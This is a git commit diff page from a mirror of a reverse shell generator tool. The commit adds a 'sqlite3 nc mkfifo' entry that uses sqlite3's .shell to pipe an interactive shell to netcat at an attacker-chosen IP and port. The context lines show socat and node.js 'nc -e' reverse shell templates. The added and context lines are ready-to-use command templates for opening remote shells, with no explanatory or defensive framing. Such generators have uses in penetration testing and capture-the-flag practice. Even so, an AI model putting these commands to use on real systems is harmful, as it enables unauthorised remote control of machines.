mirror of
https://github.com/0dayCTF/reverse-shell-generator.git
synced 2024-12-18 10:56:10 +00:00
Upd: Add a sqlite3
revshell command
This commit is contained in:
parent
43d576e33f
commit
67b9f2c702
@ -275,6 +275,11 @@ const reverseShellCommands = withCommandType(
|
||||
"command": "socat TCP:{ip}:{port} EXEC:'{shell}',pty,stderr,setsid,sigint,sane",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "sqlite3 nc mkfifo",
|
||||
"command": "sqlite3 /dev/null '.shell rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|{shell} -i 2>&1|nc {ip} {port} >/tmp/f'",
|
||||
"meta": ["linux", "mac"]
|
||||
},
|
||||
{
|
||||
"name": "node.js",
|
||||
"command": "require('child_process').exec('nc -e {shell} {ip} {port}')",
|
||||
|
Loading…
Reference in New Issue
Block a user